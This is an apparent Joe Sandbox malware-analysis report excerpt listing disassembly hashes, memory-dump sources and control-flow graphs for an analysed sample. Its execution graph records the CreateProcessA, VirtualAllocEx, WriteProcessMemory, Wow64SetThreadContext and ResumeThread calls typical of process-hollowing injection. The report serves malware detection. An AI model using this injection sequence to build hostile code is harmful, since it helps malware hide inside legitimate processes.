                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 885266447-4236105082
                                                                                                    • Opcode ID: 1d5a0af4b8faa3273e60d95d7dcb670679ab10ffbe0f9b7fa20f0873a88fddca
                                                                                                    • Instruction ID: bbb497b358deb1e2571cad1638ccf001397f1b4fbbaddaf7fe02368a5ee03e4f
                                                                                                    • Opcode Fuzzy Hash: 1d5a0af4b8faa3273e60d95d7dcb670679ab10ffbe0f9b7fa20f0873a88fddca
                                                                                                    • Instruction Fuzzy Hash: 1B512731B402156FEB14CB18DC81FE633A9ABD4724F218229FD59DF286DA75EC918790
                                                                                                    APIs
                                                                                                    • ___swprintf_l.LIBCMT ref: 00A1EA22
                                                                                                      • Part of subcall function 009F13CB: ___swprintf_l.LIBCMT ref: 009F146B
                                                                                                      • Part of subcall function 009F13CB: ___swprintf_l.LIBCMT ref: 009F1490
                                                                                                    • ___swprintf_l.LIBCMT ref: 009F156D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: %%%u$]:%u
                                                                                                    • API String ID: 48624451-3050659472
                                                                                                    • Opcode ID: 9cf865b29951035239dff461af28736fae61d64372a449cd46ad20b1be80daf2
                                                                                                    • Instruction ID: aa5fe12c5436883a6e16dd65347f833a868a97a2602df93d2c92afafbac39cc1
                                                                                                    • Opcode Fuzzy Hash: 9cf865b29951035239dff461af28736fae61d64372a449cd46ad20b1be80daf2
                                                                                                    • Instruction Fuzzy Hash: 5A21AE7290021DEBCB21DFA8CC41AFAB3ACAB90714F544416FE46E3140DB75AA588BE1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: %%%u$]:%u
                                                                                                    • API String ID: 48624451-3050659472
                                                                                                    • Opcode ID: b1faa69c4f57f4a90750f835c79f2874602b7c31edd3864d5b4f79677913dc67
                                                                                                    • Instruction ID: ebb6bcbf309dcf86cedf47efc29bff40384613add6f6bde2e19187cef49b9eed
                                                                                                    • Opcode Fuzzy Hash: b1faa69c4f57f4a90750f835c79f2874602b7c31edd3864d5b4f79677913dc67
                                                                                                    • Instruction Fuzzy Hash: 7D21BD7390021AABCF20AF6999429EF77ECAB94795F040525FC08A3141EB749E4887E1
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A122F4
                                                                                                    Strings
                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A122FC
                                                                                                    • RTL: Re-Waiting, xrefs: 00A12328
                                                                                                    • RTL: Resource at %p, xrefs: 00A1230B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 885266447-871070163
                                                                                                    • Opcode ID: c2dee7a0b200185f6326e00aa31b5f7c4f710de3fe34766f06c91ac1e87e48cd
                                                                                                    • Instruction ID: 105bb517aff6fd2cc6f1d1bd75ef5c64d5a536ca235f52e48ce92bb57fb60843
                                                                                                    • Opcode Fuzzy Hash: c2dee7a0b200185f6326e00aa31b5f7c4f710de3fe34766f06c91ac1e87e48cd
                                                                                                    • Instruction Fuzzy Hash: 03510771640705ABDB159B28CC81FE7739CAF94360F11862AFD19DB281EA75ED8187A0
                                                                                                    Strings
                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A1248D
                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A124BD
                                                                                                    • RTL: Re-Waiting, xrefs: 00A124FA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                    • API String ID: 0-3177188983
                                                                                                    • Opcode ID: 433ef0a57b163ead6c22949784bd2ba7f5d2452b372e24121a25b0d8cb7cb23b
                                                                                                    • Instruction ID: 37538f85dbec3d9d18a931b4a39ad142e806e836cf187a753030cf1025c7fe0d
                                                                                                    • Opcode Fuzzy Hash: 433ef0a57b163ead6c22949784bd2ba7f5d2452b372e24121a25b0d8cb7cb23b
                                                                                                    • Instruction Fuzzy Hash: 9E41F870600204ABCB24EF68DD85FAA77A8EF84720F208A16F555DF3D1D778E99187A1
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fassign
                                                                                                    • String ID:
                                                                                                    • API String ID: 3965848254-0
                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                    • Instruction ID: b8d89b591b0596be336de950b2a42c5442b94efa075d8c47f9a7ca32712a2d25
                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                    • Instruction Fuzzy Hash: B6918031D0028AEBDF26CF5AC8556EEB7B4EF55314F24847BD801A7192E7305E81CB91
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: $$0
                                                                                                    • API String ID: 1302938615-389342756
                                                                                                    • Opcode ID: 3b59b3e023a6777e686c36e22940a2771ddb2b6e8c29f2aacad418ae84f83d50
                                                                                                    • Instruction ID: b131783db2001ec95285b32a5420556ad68f140667cb6879fde729bcce4ff2c6
                                                                                                    • Opcode Fuzzy Hash: 3b59b3e023a6777e686c36e22940a2771ddb2b6e8c29f2aacad418ae84f83d50
                                                                                                    • Instruction Fuzzy Hash: 2991CF70D04A8AEFDF25CFB9C8553EEBBB1AF41310F14469AD8A1A72D1C7758A41CB90

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:20.1%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:92
                                                                                                    Total number of Limit Nodes:4
                                                                                                    [Execution graph: the recorded nodes resolve to calls to CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext and ResumeThread]

                                                                                                    Control-flow Graph

                                                                                                    [Control-flow graph, nodes 24f400-24f84f, calling CreateProcessA]
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0024F6C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID: l~ S$l~ S
                                                                                                    • API String ID: 963392458-3692758704
                                                                                                    • Opcode ID: c8a9e2f64a1362b3d89f3a8acc5c442af2987b65659cd14a924bbfd7ab0df473
                                                                                                    • Instruction ID: bd7fe097bd4490cf1cb5d8be6710dd0f7f5aea6b389fa1aac383fa65aabd8e88
                                                                                                    • Opcode Fuzzy Hash: c8a9e2f64a1362b3d89f3a8acc5c442af2987b65659cd14a924bbfd7ab0df473
                                                                                                    • Instruction Fuzzy Hash: C7C15770D002198FDF64CFA4C945BEEBBB1BF89300F1091AAD419B7240EB749A95CF91

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 64 24ef38-24f000 VirtualAllocEx 68 24f002-24f008 64->68 69 24f009-24f053 64->69 68->69
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0024EFEA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: Ph$l~ S
                                                                                                    • API String ID: 4275171209-640031543
                                                                                                    • Opcode ID: e0ea6bc7103530ba01b08b2fd7044974e104049ec7bcb468012088e081f1ce7f
                                                                                                    • Instruction ID: 05500b250556271704282149baebc0e31e0b26ffb2e4b98f3964bc8726802ae9
                                                                                                    • Opcode Fuzzy Hash: e0ea6bc7103530ba01b08b2fd7044974e104049ec7bcb468012088e081f1ce7f
                                                                                                    • Instruction Fuzzy Hash: 7B41ACB4D002589FCF14CFA9D984AAEFBB1BF49310F20901AE814B7210D735A916CF65

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 173 24f061-24f0d3 175 24f0d5-24f0e7 173->175 176 24f0ea-24f151 WriteProcessMemory 173->176 175->176 178 24f153-24f159 176->178 179 24f15a-24f1ac 176->179 178->179
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0024F13B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 3559483778-1765668369
                                                                                                    • Opcode ID: be5e0aef59467d6a9f9dbaa87c4389f08c25a84b8e47b6fdedf3cdabd07979d9
                                                                                                    • Instruction ID: d1c6252630db0b143794184d2f830e2aa8d45a89e3187fa5e080e942c39f1bce
                                                                                                    • Opcode Fuzzy Hash: be5e0aef59467d6a9f9dbaa87c4389f08c25a84b8e47b6fdedf3cdabd07979d9
                                                                                                    • Instruction Fuzzy Hash: 1F41BDB4D012489FDF04CFA9D984AEEFBB1BF49310F20942AE818B7250D375AA55CF64

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 184 24f068-24f0d3 186 24f0d5-24f0e7 184->186 187 24f0ea-24f151 WriteProcessMemory 184->187 186->187 189 24f153-24f159 187->189 190 24f15a-24f1ac 187->190 189->190
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0024F13B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 3559483778-1765668369
                                                                                                    • Opcode ID: 7846d0d488ab269669a91010ef3556d07631ede7bf4cb83b197a4fe9e50b6e54
                                                                                                    • Instruction ID: 68bed942b948beb60b4741eea3ec54c3458ad11d58094c2cbdc7d10f50d7573d
                                                                                                    • Opcode Fuzzy Hash: 7846d0d488ab269669a91010ef3556d07631ede7bf4cb83b197a4fe9e50b6e54
                                                                                                    • Instruction Fuzzy Hash: 7841ABB4D012589FDF04CFA9D984AEEFBB1BF49310F20902AE818B7250D375AA55CF64

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 195 24f1c0-24f290 ReadProcessMemory 198 24f292-24f298 195->198 199 24f299-24f2eb 195->199 198->199
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0024F27A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 1726664587-1765668369
                                                                                                    • Opcode ID: b0b631e2510bc66c43a713b4879a7d01d47fd95012fe2ce9b404ce1a1d2d4fcc
                                                                                                    • Instruction ID: 28af9f571a3b428592918f096fb9b3f09de7d1426db4fa3e4ba4c74cf1376c84
                                                                                                    • Opcode Fuzzy Hash: b0b631e2510bc66c43a713b4879a7d01d47fd95012fe2ce9b404ce1a1d2d4fcc
                                                                                                    • Instruction Fuzzy Hash: 0B41ABB9D002589FCF14CFA9D984AEEFBB1BF49310F20942AE814B7250D375A956CF64

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 204 24f1c8-24f290 ReadProcessMemory 207 24f292-24f298 204->207 208 24f299-24f2eb 204->208 207->208
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0024F27A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 1726664587-1765668369
                                                                                                    • Opcode ID: dfab5e4839e6be48d708622e142b8e0718b97de7f61e28f5111e01478769b2a7
                                                                                                    • Instruction ID: ecde4d81b45f622f5c0cdadc5f7c69f56df90ea60bea00083120cb1fadb66655
                                                                                                    • Opcode Fuzzy Hash: dfab5e4839e6be48d708622e142b8e0718b97de7f61e28f5111e01478769b2a7
                                                                                                    • Instruction Fuzzy Hash: DD41BBB9D002589FCF04CFA9D984AEEFBB1BF49310F20902AE814B7210D775AA55CF64

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 213 24ef40-24f000 VirtualAllocEx 216 24f002-24f008 213->216 217 24f009-24f053 213->217 216->217
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0024EFEA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 4275171209-1765668369
                                                                                                    • Opcode ID: de4906b1a42ac9ab27656379dd6dac9b6f87daf2302a68df5d21be722a55e152
                                                                                                    • Instruction ID: 540dd94e38383331065228086fc349068c02beb72cc4b1edb442ee8a7b16f71f
                                                                                                    • Opcode Fuzzy Hash: de4906b1a42ac9ab27656379dd6dac9b6f87daf2302a68df5d21be722a55e152
                                                                                                    • Instruction Fuzzy Hash: B0419AB4D002589FCF14CFA9D984AAEFBB1BF89310F20942AE814B7210D735A956CF65

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 222 24e598-24e600 224 24e617-24e665 Wow64SetThreadContext 222->224 225 24e602-24e614 222->225 227 24e667-24e66d 224->227 228 24e66e-24e6ba 224->228 225->224 227->228
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0024E64F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 983334009-1765668369
                                                                                                    • Opcode ID: 5f4bb31d36f8ed074b0fad977f6d9e503038dc9ec3217702928af3d1d80d7572
                                                                                                    • Instruction ID: c97274a2926e11df170a9b9b76b0ca0bdd0f774f18b2a548489fce4355d7ae53
                                                                                                    • Opcode Fuzzy Hash: 5f4bb31d36f8ed074b0fad977f6d9e503038dc9ec3217702928af3d1d80d7572
                                                                                                    • Instruction Fuzzy Hash: D841E0B4D102589FDF14CFA9D884AEEFBB1BF48314F24802AE418B7240D739AA45CF54

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 233 24e5a0-24e600 235 24e617-24e665 Wow64SetThreadContext 233->235 236 24e602-24e614 233->236 238 24e667-24e66d 235->238 239 24e66e-24e6ba 235->239 236->235 238->239
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0024E64F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 983334009-1765668369
                                                                                                    • Opcode ID: 9b4d1961c8b10f675cba1f3a84f5cc6b075dfdd9f7f562396485896c6d396094
                                                                                                    • Instruction ID: 47c283d9bb94291b7b5c44b7a301318ee94d6497b8b5c57507981f3c5a10d787
                                                                                                    • Opcode Fuzzy Hash: 9b4d1961c8b10f675cba1f3a84f5cc6b075dfdd9f7f562396485896c6d396094
                                                                                                    • Instruction Fuzzy Hash: 7241CDB4D102589FDF14CFA9D884AEEFBB5BF89314F24802AE418B7240D739AA45CF54

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 244 24e4a8-24e544 ResumeThread 247 24e546-24e54c 244->247 248 24e54d-24e58f 244->248 247->248
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 947044025-1765668369
                                                                                                    • Opcode ID: 0a0059788b3ae001805a4822a88e116eb281276e0a7499aae58ee7a61d6d3098
                                                                                                    • Instruction ID: d0fc2532a4ae49d53a8fd4bd60fbe41ebc0f3bfa337e3f25e48315bee590786b
                                                                                                    • Opcode Fuzzy Hash: 0a0059788b3ae001805a4822a88e116eb281276e0a7499aae58ee7a61d6d3098
                                                                                                    • Instruction Fuzzy Hash: 7C31CCB4D102189FDF14CFA9D884AAEFBB1BF89314F24841AE815B7210D775A906CF94

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 253 24e4b0-24e544 ResumeThread 256 24e546-24e54c 253->256 257 24e54d-24e58f 253->257 256->257
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409576892.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_240000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID: l~ S
                                                                                                    • API String ID: 947044025-1765668369
                                                                                                    • Opcode ID: 12bc783c732515d2411123dabd8e3a29bb171044c812be846b7cea3b7349101d
                                                                                                    • Instruction ID: 026ea83bb99f52ec68ebd0f56f5d854cbd6ddf1a872c8cee05cf3e85198b10af
                                                                                                    • Opcode Fuzzy Hash: 12bc783c732515d2411123dabd8e3a29bb171044c812be846b7cea3b7349101d
                                                                                                    • Instruction Fuzzy Hash: DC31DCB4D102189FDF14CFA9D884AAEFBB1BF88314F20841AE814B7310D735A906CF94

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dfce38d6f3b421fd5a1e519c240c60b628366a01de7e1651b7d52b73451b2741
                                                                                                    • Instruction ID: 4a94039e1d651a380e677788c889dd0cf6082ed2a68b5a853eaf0cded6a5bacd
                                                                                                    • Opcode Fuzzy Hash: dfce38d6f3b421fd5a1e519c240c60b628366a01de7e1651b7d52b73451b2741
                                                                                                    • Instruction Fuzzy Hash: 6311D4B4D04209CFCB44DFA4D9589AEBBB6FF89302F20A569C809F7251EB705A41CF91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b4ee693773ba1a313c4f657486691b28006ee7dd960323c19f49f859d527046d
                                                                                                    • Instruction ID: 34643183be967a18cec788ee05c2ac008555cfeb610da0c0eb2225955b766789
                                                                                                    • Opcode Fuzzy Hash: b4ee693773ba1a313c4f657486691b28006ee7dd960323c19f49f859d527046d
                                                                                                    • Instruction Fuzzy Hash: 3B112874908218DFCBA4CF94C884BE8B7B9BF49305F2491AAD949AB285DB705A85DF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 242f27f783ca7625eb470769c65cd37f4c762fdb5dc669e065f06701619ff5ea
                                                                                                    • Instruction ID: 90886c2ecba6c97e8a5d67a50bc749080311b7bb5d1fd7953688c36418c570cc
                                                                                                    • Opcode Fuzzy Hash: 242f27f783ca7625eb470769c65cd37f4c762fdb5dc669e065f06701619ff5ea
                                                                                                    • Instruction Fuzzy Hash: 1211A2B4D04209DFCB44DFA9D9456AEBBF5BF89301F20A16AC819E3311E7705A41DF90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4409b70cfa0c5f4ffff126fcf25dc0f4aa9ca826e1bdccdb22bafafc2a53d411
                                                                                                    • Instruction ID: 5665574349c66bbe32ec6b13f5c8229e4c22d81131eb41ce2374620d0a873ea5
                                                                                                    • Opcode Fuzzy Hash: 4409b70cfa0c5f4ffff126fcf25dc0f4aa9ca826e1bdccdb22bafafc2a53d411
                                                                                                    • Instruction Fuzzy Hash: A011AE35949228CFDB20CF64CD90FE9BBB6BB09305F1081C9E809A7291C7329E85CF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a00b56fdb14f3330bb4f83bd2f8c3b994b63a2fd9654f71d52866aa90d85fa15
                                                                                                    • Instruction ID: 3e748bebc769d26457fbd662f72cbb5b97025f61875acdb0878ab8dd0949ebe5
                                                                                                    • Opcode Fuzzy Hash: a00b56fdb14f3330bb4f83bd2f8c3b994b63a2fd9654f71d52866aa90d85fa15
                                                                                                    • Instruction Fuzzy Hash: 7B01D2389082188FCB55CFA4C890BECBBB6BB49301F24919AD909A7252D7305A95CF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2bfcd0986c62e39e5030529707e13a9f54c25420b9e9ebfcd7750a5e47d54766
                                                                                                    • Instruction ID: 376231cfafa83713a0916d7f169842a9ce9c6e22ca1e3c156f239314fae401d7
                                                                                                    • Opcode Fuzzy Hash: 2bfcd0986c62e39e5030529707e13a9f54c25420b9e9ebfcd7750a5e47d54766
                                                                                                    • Instruction Fuzzy Hash: 48F04935809399CFCB11CF20DC847F8BBB5BB4A316F2491DAC809AA396D7305A89DF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
